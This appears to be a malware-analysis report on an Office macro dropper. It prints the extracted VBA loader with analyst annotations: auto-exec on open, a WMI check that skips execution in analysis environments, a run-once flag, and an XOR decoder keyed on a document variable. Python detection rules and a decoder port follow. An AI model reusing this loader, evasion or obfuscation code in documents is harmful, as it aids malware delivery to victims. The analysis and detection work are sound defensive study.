Verdict: MALICIOUS
Risk Score: 382
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing obfuscated VBA macros. The document body instructs the user to 'Enable Content' to view the document, acting as the lure. The Document_Open macro first checks a document variable (wykYqM) that doubles as a run-once flag, then uses WMI (GetObject("winmgmts:") followed by an ExecQuery against Win32_Process) to look for running processes named 'VmRemoteGuest.exe' and 'tee.exe'; if either is present the macro does nothing, which is an analysis-environment check. Otherwise it calls the loader, sets the variable to 'juryt' and, if the document is not read-only, saves it. The loader rebuilds its strings with a custom decoder (WPltBqWOab) that XORs numeric char-arrays against characters of the wykYqM document variable read at large offsets (4004, 3906, 5318 and others), so the decryption key is the document variable itself and is not present in the extracted macro source; because the first run overwrites that variable with 'juryt' and saves, a re-saved copy can neither decode the payload nor run again. The decoded strings are fed to a WMI Win32_Process launcher (the OLE_VBA_WMI_PROCESS_CREATE finding below) to execute the payload. A #If Mac branch additionally declares a libc system() import whose library name is produced by the same decoder, which points to a second execution path on macOS; note that VBA's Declare statement normally takes a string literal after Lib, so that line as extracted may not compile and should be treated as indicative rather than confirmed.
Heuristics (10)

- ClamAV: Doc.Dropper.Agent-6472163-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6472163-0
- VBA macros detected [medium, 6 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical] (OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro [high] (OLE_VBA_DOCOPEN): Auto-executing Document_Open macro present
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call present
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call present
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure [medium] (SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  All four are XML namespace identifiers (RDF, XMP EXIF and TIFF schemas, DrawingML) left behind by embedded image and drawing metadata; they are not network indicators of the payload.
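The macro-level heuristics above can be reproduced, in approximate form, over an olevba listing. The Python below is an added example, not the analyzer's code or the sample's: it folds VBA `_` line continuations, applies regex rules labelled with the report's heuristic IDs, adds two rules of this example's own (prefixed X_, an assumption rather than a report heuristic) for the WMI process-enumeration check and the macOS Declare, and runs them on an abridged copy of the extracted source shown in this report (constructed as test input). The visible source contains no .Create call, so the WMI process-creation rule does not fire on it; the report's finding evidently rests on more than the plain text, as the heuristic description itself notes the class name is often hidden behind helper functions and a separate p-code heuristic also fired.

```python
import re

# VBA "_" line continuation: fold so multi-line Array(...) calls match as one line
CONTINUATION = re.compile(r"[ \t]+_[ \t]*\r?\n[ \t]*")
AUTOEXEC = re.compile(r"\bSub\s+(?:Document_Open|AutoOpen|Auto_Open|AutoExec|Workbook_Open)\b", re.I)


def _has(pattern: str, src: str) -> bool:
    return re.search(pattern, src, re.I) is not None


# Rules keyed by the report's heuristic labels. The matching logic is this example's own
# approximation, not the analyzer's; labels prefixed X_ are additions of this example.
RULES = {
    "OLE_VBA_DOCOPEN": lambda s: AUTOEXEC.search(s) is not None,
    "OLE_VBA_CREATEOBJ": lambda s: _has(r"\bCreateObject\s*\(", s),
    "OLE_VBA_GETOBJ": lambda s: _has(r"\bGetObject\s*\(", s),
    # WMI moniker, Win32_Process and a .Create( call visible together: the execution chain
    "OLE_VBA_WMI_PROCESS_CREATE": lambda s: all(
        _has(p, s) for p in (r"winmgmts", r"\bWin32_Process\b", r"\.Create\s*\(")),
    # auto-exec plus a long numeric Array(...) fed through Chr(... Xor ...): the decoder shape
    "OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER": lambda s: (
        AUTOEXEC.search(s) is not None
        and re.search(r"Array\s*\((?:\s*\d+\s*,){8,}", s) is not None
        and _has(r"\bChr\s*\(.*\bXor\b", s)),
    # X_: ExecQuery on Win32_Process filtered by Name, i.e. a running-process check
    "X_WMI_PROCESS_ENUM": lambda s: all(
        _has(p, s) for p in (r"\bExecQuery\s*\(", r"\bWin32_Process\b", r"\bWhere\s+Name\b")),
    # X_: Declare of libc system() (used under #If Mac), a macOS execution path
    "X_MAC_LIBC_SYSTEM": lambda s: _has(
        r"\bDeclare\s+(?:PtrSafe\s+)?Function\s+system\s+Lib\b", s),
}


def scan_vba(source: str) -> list[str]:
    """Return the sorted labels whose rule fires on the continuation-folded macro source."""
    folded = CONTINUATION.sub(" ", source)
    return sorted(label for label, rule in RULES.items() if rule(folded))


# Abridged copy of the extracted source shown in this report (constructed test input)
SAMPLE_VBA = r'''
Private Sub Document_Open()
If ActiveDocument.Variables("wykYqM").Value <> "juryt" And Not gKelhjy("VmRemoteGuest.exe") And Not gKelhjy("tee.exe") Then
egsdDwwbNSzoBn
ActiveDocument.Variables("wykYqM").Value = "juryt"
End If
End Sub
Private Function gKelhjy(prfs As String) As Boolean
Set ugkFg = GetObject("winmgmts:")
Set uSgjr = ugkFg.ExecQuery("Select * from Win32_Process Where Name = '" & prfs & "'")
If uSgjr.Count > 0 Then
gKelhjy = True
End If
End Function
Private Function WPltBqWOab(OVnsChUfpQ As Variant, ngWwQXAxlZ As Integer)
deKfLHDMwm = deKfLHDMwm + Chr(Asc(Mid(TruprARwhy, ydNFxXqQSc + ngWwQXAxlZ, 1)) Xor CInt(OVnsChUfpQ(mJicZEAwmC - 1)))
End Function
#If Mac Then
Private Declare PtrSafe Function system Lib WPltBqWOab ( Array ( 54,63,16,23,94,61,3,41,30,5 ), 5318 ) (ByVal command As String) As Long
#End If
Public Function adJhgtmGDG()
pbRq = WPltBqWOab(Array(12, 19, 96, 57, 11, 64, 8, 72, 2, 44, 2, 101, 26, 8, 70, 59, 21, 9, 117, 32, 42, _
28, 50, 23, 42, 121, 60, 59, 124, 45, 31, 51, 18, 30, 21, 62, 55, 54, 31, 31, 1), 4004)
End Function
'''

if __name__ == "__main__":
    print(scan_vba(SAMPLE_VBA))
```

Run against the full macros.bas listing rather than the abridged copy to see which labels the text alone supports; anything the report flags that this scan misses is coming from decoded strings or the p-code stream, which is where the analysis effort should go next.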
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35623 bytes | 66610eea1c4af73ec17005bb6ffbfe1c2b3bd18a7592897abbd79f6323d8a639 |
Preview script (first 1,000 lines of the extracted script; the listing ends where the report truncates it). Lines beginning with ' [analyst note] are editorial annotations, not part of the extracted source.

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst note] Auto-exec entry point. The document variable wykYqM is both the decoder key and a
' [analyst note] run-once flag: it is checked here, then overwritten with "juryt" and saved after the loader runs.
Private Sub Document_Open()
If ActiveDocument.Variables("wykYqM").Value <> "juryt" And Not gKelhjy("VmRemoteGuest.exe") And Not gKelhjy("tee.exe") Then
egsdDwwbNSzoBn
ActiveDocument.Variables("wykYqM").Value = "juryt"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
' [analyst note] WMI process-name lookup; Document_Open does nothing if either named process is running.
Private Function gKelhjy(prfs As String) As Boolean
Dim ugkFg As Object
Dim uSgjr As Variant
Dim iegL As Object
Set ugkFg = GetObject("winmgmts:")
Set uSgjr = ugkFg.ExecQuery("Select * from Win32_Process Where Name = '" & prfs & "'")
If uSgjr.Count > 0 Then
gKelhjy = True
Else
gKelhjy = False
End If
End Function
' [analyst note] Second module (NzhDVXC). WPltBqWOab is the string decoder: array element i is XORed with the
' [analyst note] key character at position (i Mod Len(key), or Len(key) when that is 0) + offset, key = wykYqM.
Attribute VB_Name = "NzhDVXC"
Private Function WPltBqWOab(OVnsChUfpQ As Variant, ngWwQXAxlZ As Integer)
Dim deKfLHDMwm, TruprARwhy As String, mJicZEAwmC, ydNFxXqQSc
TruprARwhy = ActiveDocument.Variables("wykYqM").Value()
deKfLHDMwm = ""
mJicZEAwmC = 1
While mJicZEAwmC < UBound(OVnsChUfpQ) + 2
ydNFxXqQSc = mJicZEAwmC Mod Len(TruprARwhy): If ydNFxXqQSc = 0 Then ydNFxXqQSc = Len(TruprARwhy)
deKfLHDMwm = deKfLHDMwm + Chr(Asc(Mid(TruprARwhy, ydNFxXqQSc + ngWwQXAxlZ, 1)) Xor CInt(OVnsChUfpQ(mJicZEAwmC - 1)))
mJicZEAwmC = mJicZEAwmC + 1
Wend
WPltBqWOab = deKfLHDMwm
End Function
' [analyst note] macOS branch: declares libc system() from a library whose name is itself decoded. VBA normally
' [analyst note] requires a string literal after Lib, so this line as extracted may not compile.
#If Mac Then
#If VBA7 Then
Private Declare PtrSafe Function system Lib WPltBqWOab ( Array ( 54,63,16,23,94,61,3,41,30,5 ), 5318 ) (ByVal command As String) As Long
#Else
Private Declare Function system Lib WPltBqWOab ( Array ( 54,63,16,23,94,61,3,41,30,5 ), 5318 ) (ByVal command As String) As Long
#End If
#End If
' [analyst note] Rebuilds the payload string chunk by chunk; without the wykYqM value these arrays cannot be decoded.
Public Function adJhgtmGDG()
Dim pbRq As String
pbRq = WPltBqWOab(Array(12, 19, 96, 57, 11, 64, 8, 72, 2, 44, 2, 101, 26, 8, 70, 59, 21, 9, 117, 32, 42, _
28, 50, 23, 42, 121, 60, 59, 124, 45, 31, 51, 18, 30, 21, 62, 55, 54, 31, 31, 1, _
16, 32, 0, 123, 124, 0, 17, 33, 21, 65, 14, 9, 8), 4004)
pbRq = pbRq + WPltBqWOab(Array(90, 60, 16, 15, 96, 47, 18, 54, 29, 51, 35, 53, 80, 115, 8, 29, 28, 19, 17, 55, 3, _
22, 28, 9, 80, 11, 43, 66, 83, 97, 45, 12, 91, 5, 61, 65, 2, 98, 39, 84, 12, _
69, 27, 94, 92, 2, 86, 57), 3906)
pbRq = pbRq + WPltBqWOab(Array(30, 45, 92, 17, 111, 62, 18, 42, 61, 3, 42, 109, 37, 1, 2, 13, 78, 35, 32, 0, 107, _
29, 91, 65, 95, 15, 1, 70, 95, 124, 18, 10, 59, 69, 62, 44, 91, 8, 9, 107, 15, _
21, 31, 30, 120, 56, 14, 42), 1799)
pbRq = pbRq + WPltBqWOab(Array(102, 43, 13, 31, 102, 35, 62, 0, 93, 74, 9, 12, 19, 39, 59, 41, 43, 95, 60, 45, 10, _
1, 80, 120, 4, 95, 105, 109, 32, 123, 57, 13, 4, 24, 83, 53, 48, 67, 85, 43, 56, _
10, 17, 56, 37, 60, 42, 15), 1451)
pbRq = pbRq + WPltBqWOab(Array(120, 127, 10, 45, 54, 47, 82, 116, 57, 29, 0, 87, 120, 90, 107, 116, 86, 24, 34, 48, 82, _
54, 29, 32, 9, 9, 38, 122, 97, 8, 104, 39, 47, 75, 8, 32, 60, 72, 110, 51, 54, _
51, 102, 115, 63, 121, 38, 15), 4758)
pbRq = pbRq + WPltBqWOab(Array(9, 45, 13, 39, 123, 98, 49, 5, 25, 86, 0, 94, 86, 29, 3, 48, 22, 3, 8, 55, 30, _
63, 121, 25, 8, 118, 33, 55, 21, 30, 8, 107, 45, 34, 22, 91, 123, 12, 3, 10, 68, _
85, 55, 105, 61, 37, 49, 112), 3512)
pbRq = pbRq + WPltBqWOab(Array(57, 19, 51, 67, 61, 13, 58, 56, 67, 6, 24, 69, 27, 52, 35, 26, 49, 58, 36, 59, 40, _
32, 120, 45, 22, 45, 3, 27, 2, 68, 34, 44, 19, 19, 81, 6, 44, 66, 58, 36, 62, _
121, 63, 38, 1, 118, 42, 19), 0)
pbRq = pbRq + WPltBqWOab(Array(93, 25, 40, 26, 44, 46, 15, 60, 14, 48, 109, 27, 56, 0, 36, 28, 37, 46, 103, 63, 45, _
22, 6, 23, 94, 4, 85, 57, 25, 99, 19, 47, 59, 73, 33, 7, 122, 123, 17, 119, 86, _
94, 82, 113, 96, 79, 62, 96), 2622)
pbRq = pbRq + WPltBqWOab(Array(116, 12, 126, 15, 13, 122, 57, 56, 56, 12, 16, 64, 51, 56, 53, 80, 29, 66, 25, 9, 38, _
63, 6, 11, 9, 15, 36, 39, 4, 29, 47, 39, 12, 47, 26, 10, 31, 63, 58, 107, 53, _
91, 22, 28, 55, 10, 35, 5), 1007)
pbRq = pbRq + WPltBqWOab(Array(4, 2, 11, 47, 33, 125, 5, 62, 48, 2
```
... (truncated)
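Decoding the strings requires the wykYqM document variable, which lives in the document rather than in the extracted macro. The Python below is an added example, not part of the report or of the sample: it ports the WPltBqWOab routine faithfully (1-based Mid, the Mod-wraps-to-Len rule, the large offset), parses every WPltBqWOab(Array(...), N) call site out of an olevba listing while folding VBA `_` line continuations, and decodes each chunk once a key is supplied. The key and the encoded chunks at the bottom are constructed for the demonstration (a stand-in 6000-character string and two throwaway plaintexts, with offsets borrowed from the sample's call sites); the arrays shown in the preview above cannot be decoded here because their key is not on this page.

```python
import re


def vba_decode_chunk(key: str, arr: list[int], offset: int) -> str:
    """Port of WPltBqWOab(OVnsChUfpQ, ngWwQXAxlZ) from the extracted macro.

    key    -- value of the document variable wykYqM (the macro's TruprARwhy)
    arr    -- the numeric char-array passed as Array(...)
    offset -- the second argument (ngWwQXAxlZ)
    """
    klen = len(key)
    out = []
    for i in range(1, len(arr) + 1):          # mJicZEAwmC runs 1 .. UBound+1
        pos = i % klen
        if pos == 0:                           # If ydNFxXqQSc = 0 Then ydNFxXqQSc = Len(key)
            pos = klen
        idx = pos + offset                     # Mid(key, pos + offset, 1) is 1-based
        if idx > klen:
            raise ValueError(f"key too short: Mid index {idx} exceeds key length {klen}")
        out.append(chr(ord(key[idx - 1]) ^ arr[i - 1]))
    return "".join(out)


def vba_encode_chunk(key: str, text: str, offset: int) -> list[int]:
    """Inverse of vba_decode_chunk; used only to build constructed test data."""
    klen = len(key)
    return [ord(key[(i % klen or klen) + offset - 1]) ^ ord(ch)
            for i, ch in enumerate(text, start=1)]


CONTINUATION = re.compile(r"[ \t]+_[ \t]*\r?\n[ \t]*")   # VBA "_" line continuation
CALL = re.compile(r"WPltBqWOab\s*\(\s*Array\s*\(\s*([0-9,\s]*?)\s*\)\s*,\s*(\d+)\s*\)")


def extract_chunks(source: str) -> list[tuple[list[int], int]]:
    """Find every WPltBqWOab(Array(...), N) call site, including the Declare Lib one."""
    joined = CONTINUATION.sub(" ", source)
    chunks = []
    for nums, offset in CALL.findall(joined):
        arr = [int(n) for n in re.split(r"\s*,\s*", nums.strip()) if n]
        chunks.append((arr, int(offset)))
    return chunks


def decode_all(source: str, key: str) -> list[str]:
    """Decode every chunk in call-site order; joining the adJhgtmGDG chunks yields pbRq."""
    return [vba_decode_chunk(key, arr, off) for arr, off in extract_chunks(source)]


# ---- constructed demonstration data (not from the sample) ----
# The real key is the wykYqM document variable and must be longer than the largest offset
# used (5318) plus the chunk length; a deterministic 6000-character string stands in for it.
DEMO_KEY = "".join(chr(33 + (i * 7919) % 90) for i in range(6000))
DEMO_PLAINTEXTS = ["constructed chunk one", "constructed chunk two"]
DEMO_OFFSETS = [4004, 3906]   # offsets copied from the sample's call sites; the data is made up


def _vba_call(arr: list[int], offset: int) -> str:
    half = len(arr) // 2      # split across a "_" continuation, as the sample listing does
    return ("pbRq = pbRq + WPltBqWOab(Array(" + ", ".join(map(str, arr[:half])) + ", _\n    "
            + ", ".join(map(str, arr[half:])) + f"), {offset})")


DEMO_SOURCE = "\n".join(
    _vba_call(vba_encode_chunk(DEMO_KEY, t, o), o) for t, o in zip(DEMO_PLAINTEXTS, DEMO_OFFSETS)
)

if __name__ == "__main__":
    for off, text in zip(DEMO_OFFSETS, decode_all(DEMO_SOURCE, DEMO_KEY)):
        print(off, repr(text))
```

On a real sample, read the wykYqM value out of the document first (for a .docx it is in word/settings.xml under w:docVars; for a legacy .doc it is among the user-defined variables in the Table stream), pass it as key, and concatenate the adJhgtmGDG chunks in order to obtain pbRq; the chunk with offset 5318 is the library name from the Mac Declare line. A ValueError from the decoder means the key is shorter than the offsets require, which usually indicates the variable was already overwritten with 'juryt' by an earlier run and save, so an unopened original of the document is needed.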